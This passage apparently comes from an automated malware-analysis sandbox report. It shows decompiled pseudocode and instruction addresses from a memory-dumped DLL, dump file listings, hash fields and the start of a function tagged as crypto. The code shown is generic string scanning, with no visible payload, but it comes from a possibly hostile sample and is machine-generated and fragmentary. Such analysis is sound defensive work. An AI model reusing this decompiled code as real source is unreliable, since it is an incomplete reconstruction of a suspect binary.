																					_t388 =  <=  ? _t387 + 0x20 : _t387;
																					__eflags = ( <=  ? _t387 + 0x20 : _t387) - _v44;
																					if(( <=  ? _t387 + 0x20 : _t387) == _v44) {
																						break;
																					}
																					__eflags =  *(_t601 + _t457 * 2) & 0x0000ffff;
																					if(( *(_t601 + _t457 * 2) & 0x0000ffff) != 0) {
																						continue;
																					}
																					goto L96;
																				}
																				_t510 = _v32;
																				_t570 = _v52;
																				_t383 = _v28;
																				_t598 = _t510;
																				__eflags = _t510;
																				if(_t510 == 0) {
																					goto L180;
																				}
																				goto L175;
																			}
																			_v24 = _t602;
																			_t384 = _v28;
																			L198:
																			__eflags = _t452;
																			if(__eflags == 0) {
																				goto L188;
																			}
																			if(__eflags > 0) {
																				goto L189;
																			}
																			_v28 = _t384;
																			_t592 = 0;
																			_t564 =  *_t614;
																			goto L195;
																		}
																		_v32 = _t510;
																		_t598 = _t570;
																		_v28 = _t383;
																		_t544 = _v24;
																		while(1) {
																			__eflags =  *(_t544 + _t452 * 2) & 0x0000ffff;
																			if(( *(_t544 + _t452 * 2) & 0x0000ffff) == 0) {
																				break;
																			}
																			_t452 = _t452 + 1;
																			__eflags = _t452 - _t570;
																			if(_t452 < _t570) {
																				continue;
																			}
																			_v24 = _t544;
																			_t510 = _v32;
																			_t383 = _v28;
																			goto L180;
																		}
																		_v24 = _t544;
																		_t510 = _v32;
																		_t384 = _v28;
																		goto L198;
																		L180:
																		_v28 = _t383;
																		_t449 =  ~( ~_t598 + 0x00000007 & 0x00000007) + 0x7fffffff;
																		__eflags = _t449;
																		_t571 = _v24;
																		while(1) {
																			asm("movdqu xmm1, [edi+esi*2]");
																			asm("pcmpeqw xmm1, xmm0");
																			asm("pmovmskb eax, xmm1");
																			__eflags = _t383;
																			if(_t383 != 0) {
																				break;
																			}
																			_t598 = _t598 + 8;
																			__eflags = _t598 - _t449;
																			if(_t598 < _t449) {
																				continue;
																			}
																			_v24 = _t571;
																			_t384 = _v28;
																			__eflags = _t449 - 0x7fffffff;
																			if(_t449 >= 0x7fffffff) {
																				goto L188;
																			}
																			goto L184;
																		}
																		asm("bsf ebx, ebx");
																		_v24 = _t571;
																		_t452 = (_t383 >> 1) + _t598;
																		_t384 = _v28;
																		goto L198;
																	}
																}
																L196:
																 *_t614 = _t564;
																_t350 = _v28;
																_t565 = _v36;
																_t593 = _v24;
																goto L97;
															}
															_t588 = _t588 + 1;
															__eflags = _t588 -  *_t614;
															if(_t588 <  *_t614) {
																continue;
															}
															goto L88;
														}
														_t513 = _v32;
														_t344 = _v28;
														_t590 = _t469 + 2;
														__eflags = _t590;
														if(_t590 == 0) {
															goto L52;
														}
														__eflags =  *(_t469 + 2) & 0x0000ffff;
														if(( *(_t469 + 2) & 0x0000ffff) == 0) {
															goto L52;
														}
														_v40 = _t469;
														_t426 = 0;
														__eflags = 0;
														_v32 = _t513;
														_v28 = _t344;
														while(1) {
															_t426 = _t426 + 1;
															_t469 = _v40 + _t426 * 2;
															_t345 =  *_t469 & 0x0000ffff;
															__eflags = ( *(_t590 + _t426 * 2 - 2) & 0x0000ffff) + 0xffffffbf - 0x19;
															_t346 =  <=  ? _t345 + 0x20 : _t345;
															__eflags = ( <=  ? _t345 + 0x20 : _t345) - _v44;
															if(( <=  ? _t345 + 0x20 : _t345) == _v44) {
																break;
															}
															__eflags =  *(_t590 + _t426 * 2) & 0x0000ffff;
															if(( *(_t590 + _t426 * 2) & 0x0000ffff) != 0) {
																continue;
															}
															goto L52;
														}
														_t510 = _v32;
														_t555 = _v52;
														_t340 = _v28;
														goto L68;
													}
													_v24 = _t603;
													_t341 = _v28;
													L166:
													__eflags = _t421;
													if(__eflags == 0) {
														goto L82;
													}
													if(__eflags > 0) {
														goto L83;
													}
													_t563 = _v36;
													_t591 = _v24;
													goto L89;
												}
												_v32 = _t510;
												_t587 = _t555;
												_v28 = _t340;
												_t546 = _v24;
												while(1) {
													__eflags =  *(_t546 + _t421 * 2) & 0x0000ffff;
													if(( *(_t546 + _t421 * 2) & 0x0000ffff) == 0) {
														break;
													}
													_t421 = _t421 + 1;
													__eflags = _t421 - _t555;
													if(_t421 < _t555) {
														continue;
													}
													_v24 = _t546;
													_t510 = _v32;
													_t340 = _v28;
													goto L74;
												}
												_v24 = _t546;
												_t510 = _v32;
												_t341 = _v28;
												goto L166;
												L74:
												_v28 = _t340;
												_t418 =  ~( ~_t587 + 0x00000007 & 0x00000007) + 0x7fffffff;
												__eflags = _t418;
												_t556 = _v24;
												while(1) {
													asm("movdqu xmm1, [edi+esi*2]");
													asm("pcmpeqw xmm1, xmm0");
													asm("pmovmskb eax, xmm1");
													__eflags = _t340;
													if(_t340 != 0) {
														break;
													}
													_t587 = _t587 + 8;
													__eflags = _t587 - _t418;
													if(_t587 < _t418) {
														continue;
													}
													_v24 = _t556;
													_t341 = _v28;
													__eflags = _t418 - 0x7fffffff;
													if(_t418 >= 0x7fffffff) {
														goto L82;
													}
													goto L78;
												}
												asm("bsf ebx, ebx");
												_v24 = _t556;
												_t421 = (_t340 >> 1) + _t587;
												_t341 = _v28;
												goto L166;
											}
										}
										goto L39;
									}
									_t395 =  *_t498 & 0x0000ffff;
									 *_t552 = _t395;
									__eflags = _t395;
									if(_t395 == 0) {
										goto L33;
									}
									_t396 = 0;
									__eflags = 0;
									while(1) {
										_t396 = _t396 + 1;
										_t488 =  *(_t498 + _t396 * 4 - 2) & 0x0000ffff;
										 *(_t552 + _t396 * 4 - 2) = _t488;
										__eflags = _t488;
										if(_t488 == 0) {
											goto L33;
										}
										_t489 =  *(_t498 + _t396 * 4) & 0x0000ffff;
										 *(_t552 + _t396 * 4) = _t489;
										__eflags = _t489;
										if(_t489 != 0) {
											continue;
										}
										goto L33;
									}
									goto L33;
								}
							}
							_t552 = _v64;
							goto L36;
						}
						_t398 = _t551 & 0x0000000f;
						__eflags = _t398;
						if(_t398 == 0) {
							L16:
							asm("pxor xmm0, xmm0");
							_t609 =  ~( ~_t398 + 0x00000007 & 0x00000007) + 0x7fffffff;
							__eflags = _t609;
							while(1) {
								asm("movdqu xmm1, [edi+eax*2]");
								asm("pcmpeqw xmm1, xmm0");
								asm("pmovmskb edx, xmm1");
								__eflags = _t492;
								if(_t492 != 0) {
									break;
								}
								_t398 = _t398 + 8;
								__eflags = _t398 - _t609;
								if(_t398 < _t609) {
									continue;
								}
								__eflags = _t609 - 0x7fffffff;
								if(_t609 >= 0x7fffffff) {
									L22:
									_t459 = 0x40;
									_t581 = 0x7fffffff;
									goto L23;
								} else {
									goto L20;
								}
								while(1) {
									L20:
									__eflags =  *(_t551 + _t609 * 2) & 0x0000ffff;
									if(( *(_t551 + _t609 * 2) & 0x0000ffff) == 0) {
										break;
									}
									_t609 = _t609 + 1;
									__eflags = _t609 - 0x7fffffff;
									if(_t609 < 0x7fffffff) {
										continue;
									}
									goto L22;
								}
								L62:
								__eflags = _t581 - 0xfffffffe;
								if(_t581 != 0xfffffffe) {
									_t459 = 0x40;
								} else {
									 *_t551 = 0;
									_t459 = _v60;
								}
								goto L23;
							}
							asm("bsf esi, edx");
							_t581 = (_t609 >> 1) + _t398;
							goto L62;
						}
						_t609 = 0;
						__eflags = _t398 & 0x00000001;
						if((_t398 & 0x00000001) != 0) {
							goto L20;
						}
						_t398 =  ~_t398 + 0x10 >> 1;
						__eflags = _t398;
						while(1) {
							_t492 =  *(_t551 + _t609 * 2) & 0x0000ffff;
							__eflags = _t492;
							if(_t492 == 0) {
								goto L62;
							}
							_t609 = _t609 + 1;
							__eflags = _t609 - _t398;
							if(_t609 < _t398) {
								continue;
							}
							goto L16;
						}
						goto L62;
					}
					_t319 =  &_v64;
					goto L37;
				}
				if(_t551 == 0) {
					L6:
					_push(2);
					_push(_t304);
					E6E7910B0();
					_t614 =  &(_t614[2]);
					goto L8;
				}
				_t492 =  *_t304 & 0x0000ffff;
				 *_t551 = _t492;
				if(_t492 == 0) {
					goto L6;
				}
				while(1) {
					_t492 = 1;
					_t490 = _t304[1] & 0x0000ffff;
					 *(_t551 + 2) = _t490;
					if(_t490 == 0) {
						goto L6;
					}
					_t491 = _t304[2] & 0x0000ffff;
					 *(_t551 + 4) = _t491;
					if(_t491 != 0) {
						continue;
					}
					goto L6;
				}
				goto L6;
			}

0x6e79c59e
0x6e79c5a2
0x6e79c5a4
0x6e79c5a8
0x6e79c5b2
0x6e79c5b4
0x6e79c5b7
0x6e79c5bd
0x6e79c5f7
0x6e79c5f9
0x6e79c5fc
0x6e79c600
0x6e79c608
0x6e79c60e
0x6e79c619
0x6e79c61b
0x6e79d019
0x6e79d01e
0x6e79c69f
0x6e79c6a4
0x6e79c6a4
0x6e79c6a7
0x6e79c6aa
0x6e79c6ad
0x6e79c6af
0x6e79c6c4
0x6e79c6c7
0x6e79c6c7
0x6e79c6cd
0x6e79c6d5
0x6e79c6d5
0x6e79c6d5
0x6e79c6d6
0x6e79c6e0
0x6e79c6ea
0x6e79c6ed
0x6e79c6f3
0x6e79c6f5
0x6e79c6f8
0x6e79c6fc
0x6e79c6fe
0x6e79c738
0x6e79c73a
0x00000000
0x6e79c700
0x6e79c700
0x6e79c702
0x6e79c72b
0x6e79c72b
0x6e79c72d
0x6e79c72e
0x6e79c733
0x6e79c73d
0x6e79c740
0x6e79c744
0x6e79c748
0x6e79c74c
0x6e79c74e
0x6e79c752
0x6e79c758
0x6e79c75d
0x6e79c75d
0x6e79c761
0x6e79c76a
0x6e79c76a
0x6e79c76f
0x6e79c774
0x6e79c776
0x6e79c77e
0x6e79c780
0x6e79c786
0x6e79c78a
0x6e79c7c9
0x6e79c878
0x6e79c878
0x6e79c87b
0x6e79c87d
0x6e79c884
0x6e79c884
0x6e79c886
0x6e79c88a
0x6e79c894
0x6e79c898
0x6e79c8a8
0x6e79c8a8
0x6e79c78e
0x6e79c7b7
0x6e79c7b7
0x6e79c7b9
0x6e79c7ba
0x6e79c7bf
0x00000000
0x6e79c7bf
0x6e79c790
0x6e79c793
0x6e79c798
0x00000000
0x00000000
0x6e79c79a
0x6e79c79c
0x6e79c79c
0x6e79c79d
0x6e79c7a2
0x6e79c7a9
0x00000000
0x00000000
0x6e79c7ab
0x6e79c7af
0x6e79c7b5
0x00000000
0x00000000
0x00000000
0x6e79c7b5
0x00000000
0x6e79c79c
0x6e79c763
0x6e79c768
0x6e79c7d1
0x6e79c7d3
0x6e79c7d5
0x6e79c819
0x6e79c819
0x6e79c81e
0x6e79c823
0x6e79c825
0x6e79c82d
0x6e79c82f
0x6e79c835
0x6e79c837
0x6e79c839
0x6e79c873
0x6e79c875
0x00000000
0x6e79c875
0x6e79c83b
0x6e79c83d
0x6e79c866
0x6e79c866
0x6e79c868
0x6e79c869
0x6e79c86e
0x00000000
0x6e79c86e
0x6e79c83f
0x6e79c842
0x6e79c845
0x6e79c847
0x00000000
0x00000000
0x6e79c849
0x6e79c849
0x6e79c84b
0x6e79c84b
0x6e79c84c
0x6e79c851
0x6e79c856
0x6e79c858
0x00000000
0x00000000
0x6e79c85a
0x6e79c85e
0x6e79c862
0x6e79c864
0x00000000
0x00000000
0x00000000
0x6e79c864
0x00000000
0x6e79c84b
0x6e79c7da
0x6e79c7dc
0x00000000
0x00000000
0x6e79c7de
0x6e79c7e5
0x6e79c7eb
0x6e79c7ee
0x6e79c7ee
0x6e79c7f0
0x6e79c7f3
0x6e79c7f7
0x6e79c7f7
0x6e79c7fb
0x6e79c7fe
0x6e79c801
0x6e79c804
0x6e79c807
0x6e79c80a
0x00000000
0x00000000
0x6e79c810
0x6e79c815
0x6e79c817
0x00000000
0x00000000
0x00000000
0x6e79c817
0x6e79c8c8
0x6e79c8cc
0x6e79c8cf
0x6e79c8d1
0x00000000
0x00000000
0x6e79c8d9
0x6e79c8dc
0x6e79c8e6
0x6e79c8ec
0x6e79c8ee
0x6e79c8f2
0x6e79c8f6
0x6e79c8fa
0x6e79c90a
0x6e79c90a
0x6e79c90a
0x6e79c90c
0x6e79c90e
0x00000000
0x00000000
0x6e79c910
0x6e79c912
0x6e79c914
0x6e79c98b
0x6e79c98b
0x6e79c98f
0x6e79c993
0x6e79c997
0x6e79c999
0x00000000
0x00000000
0x6e79c99f
0x6e79c9a0
0x6e79c9a6
0x00000000
0x00000000
0x6e79c9a8
0x6e79c9ac
0x6e79c9b0
0x6e79c9b0
0x6e79c9b5
0x6e79c9b5
0x6e79c9b8
0x6e79c9b8
0x6e79c9ba
0x6e79c9be
0x6e79c9c2
0x6e79c9c2
0x6e79c9ca
0x6e79c9cd
0x6e79c9d1
0x6e79c9d4
0x6e79c9d7
0x6e79c9da
0x6e79c9e0
0x6e79c9e6
0x6e79c9e9
0x6e79c9ec
0x00000000
0x00000000
0x6e79c9f8
0x6e79c9fa
0x6e79ca02
0x6e79ca02
0x6e79ca06
0x6e79ca0a
0x6e79ca0e
0x6e79ca12
0x6e79ca12
0x6e79ca14
0x00000000
0x00000000
0x6e79ca1a
0x6e79ca1e
0x6e79ca22
0x6e79ca26
0x6e79ca26
0x6e79ca28
0x6e79ca28
0x6e79ca2a
0x6e79ca2c
0x6e79ca2c
0x6e79ca2f
0x00000000
0x00000000
0x6e79ca39
0x6e79ca3b
0x00000000
0x00000000
0x6e79ca41
0x6e79ca44
0x6e79ca46
0x6e79ca4a
0x6e79ca4a
0x6e79ca50
0x6e79ca53
0x6e79ca59
0x6e79ca5c
0x6e79ca67
0x6e79ca6a
0x6e79ca6d
0x00000000
0x00000000
0x6e79ca77
0x6e79ca79
0x00000000
0x00000000
0x6e79ca7b
0x6e79ca7b
0x6e79ca7f
0x6e79ca83
0x6e79ca87
0x6e79ca8b
0x6e79ca8b
0x6e79ca8d
0x6e79caa8
0x6e79cab4
0x6e79cab4
0x6e79caba
0x6e79caba
0x6e79cabf
0x6e79cac3
0x6e79cac7
0x6e79cac9
0x00000000
0x00000000
0x6e79cacf
0x6e79cad2
0x6e79cad4
0x00000000
0x00000000
0x6e79cad6
0x6e79cadc
0x6e79caef
0x6e79caef
0x6e79caf4
0x6e79caf6
0x6e79caf6
0x6e79caf9
0x6e79cb15
0x6e79cb21
0x6e79cb21
0x6e79cb27
0x6e79cb27
0x6e79cb2c
0x6e79cb30
0x6e79cb34
0x6e79cb36
0x00000000
0x00000000
0x6e79cb3c
0x6e79cb3f
0x6e79cb41
0x00000000
0x00000000
0x6e79cb43
0x6e79cb49
0x6e79cb5c
0x6e79cb5c
0x6e79cb61
0x6e79cb66
0x6e79cb6e
0x6e79cb70
0x6e79cb72
0x6e79cb74
0x6e79cb77
0x6e79cb79
0x6e79cb7c
0x6e79cb7f
0x6e79cb81
0x6e79cb84
0x6e79cb86
0x6e79ccdc
0x6e79ccdc
0x6e79cce6
0x6e79cce8
0x6e79ccee
0x6e79ccf0
0x6e79ccf2
0x6e79cd31
0x00000000
0x6e79cd31
0x6e79ccf4
0x6e79ccf6
0x6e79cd1f
0x6e79cd1f
0x6e79cd21
0x6e79cd22
0x6e79cd27
0x00000000
0x6e79cd27
0x6e79ccf8
0x6e79ccfb
0x6e79ccfe
0x6e79cd00
0x00000000
0x00000000
0x6e79cd02
0x6e79cd02
0x6e79cd04
0x6e79cd04
0x6e79cd05
0x6e79cd0a
0x6e79cd0f
0x6e79cd11
0x00000000
0x00000000
0x6e79cd13
0x6e79cd17
0x6e79cd1b
0x6e79cd1d
0x00000000
0x00000000
0x00000000
0x6e79cd1d
0x00000000
0x6e79cd04
0x6e79cb8c
0x6e79cb8f
0x6e79cb91
0x00000000
0x00000000
0x6e79cb97
0x6e79cb99
0x6e79cc09
0x6e79cc0e
0x6e79cc0e
0x6e79cc11
0x6e79cc14
0x6e79cc17
0x6e79cc19
0x6e79cc2c
0x6e79cc2f
0x6e79cc2f
0x6e79cc35
0x6e79cc3d
0x6e79cc3d
0x6e79cc3d
0x6e79cc3e
0x6e79cc48
0x6e79cc52
0x6e79cc55
0x6e79cc5b
0x6e79cc5d
0x6e79cc63
0x6e79cc65
0x6e79cc67
0x6e79cca1
0x6e79cca3
0x00000000
0x6e79cc69
0x6e79cc69
0x6e79cc6b
0x6e79cc94
0x6e79cc94
0x6e79cc96
0x6e79cc97
0x6e79cc9c
0x6e79cca6
0x6e79cca6
0x6e79ccac
0x6e79ccaf
0x6e79ccb1
0x6e79ccb1
0x6e79ccb3
0x00000000
0x00000000
0x6e79ccb9
0x6e79ccc3
0x6e79ccc3
0x6e79ccc6
0x6e79ccc7
0x6e79ccca
0x6e79cccc
0x00000000
0x00000000
0x6e79ccce
0x6e79ccd0
0x6e79cd3b
0x00000000
0x6e79cd3b
0x6e79ccd2
0x6e79ccd2
0x6e79ccd4
0x00000000
0x00000000
0x6e79ccbd
0x6e79ccc0
0x6e79ccc0
0x6e79ccc0
0x6e79ccc3
0x6e79cc6d
0x6e79cc70
0x6e79cc73
0x6e79cc75
0x00000000
0x00000000
0x6e79cc77
0x6e79cc77
0x6e79cc79
0x6e79cc79
0x6e79cc7a
0x6e79cc7f
0x6e79cc84
0x6e79cc86
0x00000000
0x00000000
0x6e79cc88
0x6e79cc8c
0x6e79cc90
0x6e79cc92
0x00000000
0x00000000
0x00000000
0x6e79cc92
0x00000000
0x6e79cc79
0x6e79cc67
0x6e79cc1b
0x00000000
0x6e79cc1b
0x6e79cb9d
0x6e79cb9d
0x6e79cba0
0x6e79cbbd
0x6e79cbc9
0x6e79cbc9
0x6e79cbcf
0x6e79cbcf
0x6e79cbd4
0x6e79cbd8
0x6e79cbdc
0x6e79cbde
0x00000000
0x00000000
0x6e79cbe4
0x6e79cbe7
0x6e79cbe9
0x00000000
0x00000000
0x6e79cbeb
0x6e79cbf1
0x6e79cc04
0x6e79cc04
0x00000000
0x00000000
0x00000000
0x00000000
0x6e79cbf3
0x6e79cbf3
0x6e79cbf7
0x6e79cbf9
0x00000000
0x00000000
0x6e79cbfb
0x6e79cbfc
0x6e79cc02
0x00000000
0x00000000
0x00000000
0x6e79cc02
0x00000000
0x6e79cbf3
0x6e79cd6b
0x6e79cd70
0x00000000
0x6e79cd70
0x6e79cba2
0x6e79cba4
0x6e79cba7
0x00000000
0x00000000
0x6e79cbae
0x6e79cbae
0x6e79cbb0
0x6e79cbb0
0x6e79cbb4
0x6e79cbb6
0x00000000
0x00000000
0x6e79cbb8
0x6e79cbb9
0x6e79cbbb
0x00000000
0x00000000
0x00000000
0x6e79cbbb
0x00000000
0x00000000
0x00000000
0x00000000
0x6e79cb4b
0x6e79cb4b
0x6e79cb4f
0x6e79cb51
0x00000000
0x00000000
0x6e79cb53
0x6e79cb54
0x6e79cb5a
0x00000000
0x00000000
0x00000000
0x6e79cb5a
0x00000000
0x6e79cb4b
0x6e79cd77
0x6e79cd7c
0x00000000
0x6e79cd7c
0x6e79cafb
0x6e79cafd
0x6e79caff
0x00000000
0x00000000
0x6e79cb06
0x6e79cb06
0x6e79cb08
0x6e79cb08
0x6e79cb0c
0x6e79cb0e
0x00000000
0x00000000
0x6e79cb10
0x6e79cb11
0x6e79cb13
0x00000000
0x00000000
0x00000000
0x6e79cb13
0x00000000
0x00000000
0x00000000
0x00000000
0x6e79cade
0x6e79cade
0x6e79cae2
0x6e79cae4
0x00000000
0x00000000
0x6e79cae6
0x6e79cae7
0x6e79caed
0x00000000
0x00000000
0x00000000
0x6e79caed
0x00000000
0x6e79cade
0x6e79cd83
0x6e79cd88
0x00000000
0x6e79cd88
0x6e79ca8f
0x6e79ca91
0x6e79ca93
0x00000000
0x00000000
0x6e79ca95
0x6e79ca99
0x6e79ca9b
0x6e79ca9b
0x6e79ca9f
0x6e79caa1
0x00000000
0x00000000
0x6e79caa3
0x6e79caa4
0x6e79caa6
0x00000000
0x00000000
0x00000000
0x6e79caa6
0x00000000
0x6e79ca9b
0x6e79cd8f
0x6e79cd93
0x6e79cd97
0x6e79cd9b
0x6e79cdad
0x6e79cdad
0x6e79cdaf
0x6e79cdb1
0x00000000
0x00000000
0x6e79cdb3
0x6e79cdb3
0x6e79cdb5
0x6e79cdb7
0x6e79ce2e
0x6e79ce2e
0x6e79ce32
0x6e79ce36
0x6e79ce3a
0x6e79ce3c
0x00000000
0x00000000
0x6e79ce42
0x6e79ce43
0x6e79ce49
0x00000000
0x00000000
0x6e79ce4b
0x6e79ce4f
0x6e79ce53
0x6e79ce53
0x6e79ce58
0x6e79ce58
0x6e79ce5c
0x6e79ce5c
0x6e79ce5e
0x6e79ce62
0x6e79ce66
0x6e79ce66
0x6e79ce6e
0x6e79ce71
0x6e79ce75
0x6e79ce78
0x6e79ce7b
0x6e79ce7e
0x6e79ce84
0x6e79ce8a
0x6e79ce8d
0x6e79ce90
0x00000000
0x00000000
0x6e79ce94
0x6e79ce96
0x6e79cea2
0x6e79cea2
0x6e79cea5
0x6e79cea5
0x6e79cea7
0x6e79ceab
0x6e79ceab
0x6e79cead
0x00000000
0x00000000
0x00000000
0x6e79cead
0x6e79ce98
0x6e79ce99
0x6e79ce9d
0x00000000
0x00000000
0x00000000
0x6e79ce9d
0x6e79ceec
0x6e79cef4
0x6e79cefa
0x6e79cefa
0x6e79cefd
0x6e79cf4b
0x6e79cf4b
0x6e79cf4f
0x00000000
0x6e79cf4f
0x6e79cf03
0x6e79cf05
0x00000000
0x00000000
0x6e79cf07
0x6e79cf0b
0x6e79cf0b
0x6e79cf0d
0x6e79cf11
0x6e79cf15
0x6e79cf15
0x6e79cf1f
0x6e79cf22
0x6e79cf28
0x6e79cf32
0x6e79cf35
0x6e79cf38
0x00000000
0x00000000
0x6e79cf42
0x6e79cf44
0x00000000
0x00000000
0x00000000
0x6e79cf46
0x6e79cda1
0x6e79cda5
0x6e79cda9
0x6e79cdad
0x6e79cdaf
0x6e79cdb1
0x00000000
0x00000000
0x00000000
0x6e79cdb1
0x6e79cf58
0x6e79cf5c
0x6e79ced3
0x6e79ced3
0x6e79ced5
0x00000000
0x00000000
0x6e79cedb
0x00000000
0x00000000
0x6e79cee1
0x6e79cee5
0x6e79cee7
0x00000000
0x6e79cee7
0x6e79cdb9
0x6e79cdbd
0x6e79cdbf
0x6e79cdc3
0x6e79cdc7
0x6e79cdcb
0x6e79cdcd
0x00000000
0x00000000
0x6e79cdd3
0x6e79cdd4
0x6e79cdd6
0x00000000
0x00000000
0x6e79cdd8
0x6e79cddc
0x6e79cde0
0x00000000
0x6e79cde0
0x6e79cec7
0x6e79cecb
0x6e79cecf
0x00000000
0x6e79cde4
0x6e79cdf0
0x6e79cdf4
0x6e79cdf4
0x6e79cdfa
0x6e79cdfe
0x6e79cdfe
0x6e79ce03
0x6e79ce07
0x6e79ce0b
0x6e79ce0d
0x00000000
0x00000000
0x6e79ce13
0x6e79ce16
0x6e79ce18
0x00000000
0x00000000
0x6e79ce1a
0x6e79ce22
0x6e79ce26
0x6e79ce2c
0x00000000
0x00000000
0x00000000
0x6e79ce2c
0x6e79cf67
0x6e79cf6c
0x6e79cf70
0x6e79cf76
0x00000000
0x6e79cf76
0x6e79cdad
0x6e79ceb3
0x6e79ceb3
0x6e79ceb6
0x6e79ceba
0x6e79cebe
0x00000000
0x6e79cebe
0x6e79c9fc
0x6e79c9fd
0x6e79ca00
0x00000000
0x00000000
0x00000000
0x6e79ca00
0x6e79cf7f
0x6e79cf87
0x6e79cf8d
0x6e79cf8d
0x6e79cf90
0x00000000
0x00000000
0x6e79cf9a
0x6e79cf9c
0x00000000
0x00000000
0x6e79cfa2
0x6e79cfa6
0x6e79cfa6
0x6e79cfa8
0x6e79cfac
0x6e79cfb0
0x6e79cfb0
0x6e79cfba
0x6e79cfbd
0x6e79cfc3
0x6e79cfcd
0x6e79cfd0
0x6e79cfd3
0x00000000
0x00000000
0x6e79cfdd
0x6e79cfdf
0x00000000
0x00000000
0x00000000
0x6e79cfe1
0x6e79c8fe
0x6e79c902
0x6e79c906
0x00000000
0x6e79c906
0x6e79cfe6
0x6e79cfea
0x6e79cd50
0x6e79cd50
0x6e79cd52
0x00000000
0x00000000
0x6e79cd58
0x00000000
0x00000000
0x6e79cd5e
0x6e79cd62
0x00000000
0x6e79cd62
0x6e79c916
0x6e79c91a
0x6e79c91c
0x6e79c920
0x6e79c924
0x6e79c928
0x6e79c92a
0x00000000
0x00000000
0x6e79c930
0x6e79c931
0x6e79c933
0x00000000
0x00000000
0x6e79c935
0x6e79c939
0x6e79c93d
0x00000000
0x6e79c93d
0x6e79cd44
0x6e79cd48
0x6e79cd4c
0x00000000
0x6e79c941
0x6e79c94d
0x6e79c951
0x6e79c951
0x6e79c957
0x6e79c95b
0x6e79c95b
0x6e79c960
0x6e79c964
0x6e79c968
0x6e79c96a
0x00000000
0x00000000
0x6e79c970
0x6e79c973
0x6e79c975
0x00000000
0x00000000
0x6e79c977
0x6e79c97f
0x6e79c983
0x6e79c989
0x00000000
0x00000000
0x00000000
0x6e79c989
0x6e79cff5
0x6e79cffa
0x6e79cffe
0x6e79d004
0x00000000
0x6e79d004
0x6e79c90a
0x00000000
0x6e79c768
0x6e79c704
0x6e79c707
0x6e79c70a
0x6e79c70c
0x00000000
0x00000000
0x6e79c70e
0x6e79c70e
0x6e79c710
0x6e79c710
0x6e79c711
0x6e79c716
0x6e79c71b
0x6e79c71d
0x00000000
0x00000000
0x6e79c71f
0x6e79c723
0x6e79c727
0x6e79c729
0x00000000
0x00000000
0x00000000
0x6e79c729
0x00000000
0x6e79c710
0x6e79c6fe
0x6e79c6b1
0x00000000
0x6e79c6b1
0x6e79c623
0x6e79c623
0x6e79c626
0x6e79c646
0x6e79c64a
0x6e79c656
0x6e79c656
0x6e79c65c
0x6e79c65c
0x6e79c661
0x6e79c665
0x6e79c669
0x6e79c66b
0x00000000
0x00000000
0x6e79c671
0x6e79c674
0x6e79c676
0x00000000
0x00000000
0x6e79c678
0x6e79c67e
0x6e79c695
0x6e79c695
0x6e79c69a
0x00000000
0x00000000
0x00000000
0x00000000
0x6e79c680
0x6e79c680
0x6e79c684
0x6e79c686
0x00000000
0x00000000
0x6e79c68c
0x6e79c68d
0x6e79c693
0x00000000
0x00000000
0x00000000
0x6e79c693
0x6e79c8ab
0x6e79c8ab
0x6e79c8ae
0x6e79c8be
0x6e79c8b0
0x6e79c8b2
0x6e79c8b5
0x6e79c8b5
0x00000000
0x6e79c8ae
0x6e79d00d
0x6e79d012
0x00000000
0x6e79d012
0x6e79c628
0x6e79c62a
0x6e79c62c
0x00000000
0x00000000
0x6e79c633
0x6e79c633
0x6e79c635
0x6e79c635
0x6e79c639
0x6e79c63b
0x00000000
0x00000000
0x6e79c641
0x6e79c642
0x6e79c644
0x00000000
0x00000000
0x00000000
0x6e79c644
0x00000000
0x6e79c635
0x6e79c610
0x00000000
0x6e79c610
0x6e79c5c1
0x6e79c5ea
0x6e79c5ea
0x6e79c5ec
0x6e79c5ed
0x6e79c5f2
0x00000000
0x6e79c5f2
0x6e79c5c3
0x6e79c5c6
0x6e79c5cb
0x00000000
0x00000000
0x6e79c5cf
0x6e79c5cf
0x6e79c5d0
0x6e79c5d5
0x6e79c5dc
0x00000000
0x00000000
0x6e79c5de
0x6e79c5e2
0x6e79c5e8
0x00000000
0x00000000
0x00000000
0x6e79c5e8
0x00000000

Strings

@, xrefs: 6E79C600

Memory Dump Source

Source File: 00000001.00000002.810775796.000000006E781000.00000020.00020000.sdmp, Offset: 6E780000, based on PE: true

Associated: 00000001.00000002.810755520.000000006E780000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.810925082.000000006E7B5000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.810943271.000000006E7BB000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.810959866.000000006E7BC000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID: @
API String ID: 0-2766056989
Opcode ID: 34e3e757357182d4be67d558aec357958c2c3175704b9db7323992076a550c51
Instruction ID: b445cfa92f7e86d8afba5cbe102960754a9cb4bffa90e709ecbf8a77271ff746
Opcode Fuzzy Hash: 34e3e757357182d4be67d558aec357958c2c3175704b9db7323992076a550c51
Instruction Fuzzy Hash: 546225716047128BDB00CFAAD59062AB3E2BFC9715F148B2DE8A59B3B4E730D941DB81

Uniqueness

Uniqueness Score: -1.00%

Function 6E7A2E60, Relevance: 2.0, Strings: 1, Instructions: 797
COMMONCrypto

Download Yara Rule

C-Code - Quality: 93%

			E6E7A2E60(signed int __ecx, void* __eflags, signed int _a4, char _a8) {
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				intOrPtr _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				char* _t230;
				signed int _t231;
				signed int* _t237;
				char* _t238;
				void* _t245;
				signed int _t246;
				char _t249;
				signed int _t251;
				signed int _t254;
				signed int _t256;
				void* _t257;
				void* _t258;
				signed int _t262;
				signed int _t264;
				signed int _t265;
				signed int _t266;
				signed int _t268;
				char _t271;
				signed int _t273;
				signed int _t279;
				signed int _t280;
				signed int _t283;
				signed int _t284;
				void* _t286;
				void* _t288;
				signed int _t292;
				void* _t295;
				signed int _t298;
				signed int _t299;
				signed int _t300;
				signed int _t301;
				signed int _t302;
				signed int _t308;
				signed int _t310;
				signed int _t311;
				char _t312;
				char _t313;
				char _t314;
				char _t315;
				signed int _t316;
				signed int _t317;
				signed int _t318;
				signed int _t319;
				signed int _t325;
				signed int _t326;
				signed int _t327;
				signed int _t328;
				signed int _t329;
				void* _t330;
				signed int _t331;
				signed int _t332;
				signed int _t335;
				signed int _t336;
				void* _t337;
				signed int _t340;
				void* _t341;
				signed int _t342;
				signed int _t343;
				signed int _t344;
				char* _t347;
				signed int _t350;
				signed int _t352;
				void* _t355;
				signed int _t357;
				char _t359;
				signed int _t362;
				signed int _t363;
				signed int _t365;
				signed int _t366;
				signed int _t367;
